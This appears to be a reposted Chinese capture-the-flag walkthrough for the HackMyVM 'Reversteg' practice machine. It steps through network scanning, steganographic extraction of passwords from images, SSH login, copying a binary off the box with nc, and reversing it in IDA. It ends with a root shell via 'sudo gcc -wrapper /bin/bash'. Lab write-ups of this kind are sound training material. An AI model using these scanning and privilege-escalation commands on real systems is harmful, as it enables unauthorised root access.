您的位置:首页 > 财经 > 产业 > 珠海微网站建设_上海企业vi设计_最有效的15个营销方法_百度热搜电视剧

珠海微网站建设_上海企业vi设计_最有效的15个营销方法_百度热搜电视剧

2025/3/31 14:01:48 来源:https://blog.csdn.net/2301_80105510/article/details/146578657  浏览:    关键词:珠海微网站建设_上海企业vi设计_最有效的15个营销方法_百度热搜电视剧
珠海微网站建设_上海企业vi设计_最有效的15个营销方法_百度热搜电视剧

arp-scan -l

nmap -sS -v 192.168.222.45

在源码中可以看到

根据下面的提示可以猜测117db0148dc179a2c2245c5a30e63ab0是一个图像文件

将图片下载到本地

隐写术

在两张图片上使用strings,发现有一些可打印的字符串

strings 117db0148dc179a2c2245c5a30e63ab0.jpg

base64解码

zsteg也可以提取一些关于 PNG 图像的隐藏信息

zsteg 117db0148dc179a2c2245c5a30e63ab0.png

提取png隐藏信息的工具:zsteg、exiftool、binwalk、foremost

提取jpg隐藏信息的工具:strings、steghide

使用 steghide 提取更多信息的密码是“morainelake”

steghide extract -sf 117db0148dc179a2c2245c5a30e63ab0.jpg -p "morainelake"

连接ssh

secret.zip的密码是morainelake

cat history > a

cat history > b

grep -f a b

history可能被写入到定时任务中,每次查看都会更改,真的flag不变

grep -f a b 是一个在 Unix/Linux 系统中常用的命令,用于从文件 b 中筛选出与文件 a 中的模式匹配的行。

将reverse文件发送到本地
nc -lp 1234 > rev2
nc 192.168.222.149 < reverse

分析reverse

将reverse拖进ida,调试,找到密码

运行reverse,输入密码,运行成功

cat tmp |tr -d '\n'

ll104567bamuweta0eviden即为密码

总共有两个用户,尝试登录到welcome

切换用户
su - welcome

提权

sudo -l

sudo /usr/bin/gcc -wrapper /opt/../../../bin/bash,-s .

参考:

hackmyvm medium Reversteg靶场复盘_哔哩哔哩_bilibili

https://nutzh.top/hackmyvm/reversteg/?i=1

gcc | GTFOBins

 

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com